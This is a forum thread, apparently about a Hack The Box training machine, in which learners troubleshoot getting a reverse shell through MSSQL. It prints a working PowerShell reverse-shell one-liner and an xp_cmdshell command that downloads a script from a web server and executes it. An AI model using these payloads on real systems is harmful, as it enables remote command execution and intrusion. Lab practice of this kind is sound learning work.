Starting Point: Foothold

SOLVED: Path to the payload was incorrect in web server.

Hello

I am having trouble getting a shell back for sql_svc.

I have set up my nc correctly, listening on 443, and established my mini web server on port 80. I can browse to it myself and see the file that is supposed to be picked up. I named the callback script shell.ps1 just like it suggested.

I also changed all the IPs within the PowerShell script to make sure it was calling back to my tunnel and not whatever IP was listed in the instructions “10.10.14.3”

Here is the script:

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Whenever I run the xp_cmdshell command into my SQL session it does nothing. My web server does nothing as well.

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”

I’m still learning unix basics as well, but I saved the powershell script in kali by simply naming it as shell.ps1 in Text Editor with the commands listed inside. Just like it is above. This is correct right? It should treat the file as intended on the sql Server?

Thank you in advance for the help!

bump

how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

@tuhi said:
how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I couldn’t tell you how exactly, but I just kept trying until it worked.

One thing I suspect was my horrible attention to detail. Be REALLY careful when copy pasting your password into the password prompt. That same error apparently happens for bad creds.

So double triple check your password.

@tuhi said:

how did you get past [-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

For me, when logging in I had to change the username '\' to a '/'.

Hi @TheBrick, I can get the payload, but my cmdshell just sits and does not look like it has brought the shell back. I am monitoring the nc and the http and I can see from the logs that the request has reached them. Anything you can think of that I am not doing? Thanks.

Worked it out!!! Don't worry.